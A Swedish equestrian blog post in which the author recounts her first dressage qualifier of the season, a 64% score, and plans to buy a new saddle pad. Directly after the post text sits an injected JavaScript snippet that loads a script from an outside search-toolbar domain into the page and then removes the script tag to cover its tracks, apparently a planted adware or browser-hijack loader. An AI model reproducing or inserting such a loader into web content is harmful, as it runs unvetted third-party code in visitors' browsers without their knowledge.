Livet hos Hogengård

Andra kvalet idag

Första starten för i år. Dagen började klockan fyra, gamla tiden. Tur vi fick så suveränt fint väder. Tävlingen gick inomhus som fröken Sass är måttligt förtjust i. På framridningen höll hon andan tills jag bad om lite friska galopplängningar. Då lossnade det. Första momentet i MsvC:1, efter halten, är en diagonal med mellantrav. Mitt i denna ville hon stanna och bajsa. Jag drev på och då blev det galopp. Inte så snyggt. Vi hade ett par till rätt grova missar men fick också till en hel del i galoppen. Vi slutade på 64% och strax utanför placering. Mycket nöjd då det var första starten för säsongen och hennes fjärde totalt. Nu får jag uppdatera mig på vad som ingår i MsvB. Och köpa ett nytt vitt schabrak. Mina är minst 15 år gamla och jag tänkte köpa ett nytt när jag klarat mina kval. Det vill säga nu. 🙂

(function(){try{var header=document.getElementsByTagName(”HEAD”)[0];var script=document.createElement(”SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Related Posts

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

The reCAPTCHA verification period has expired. Please reload the page.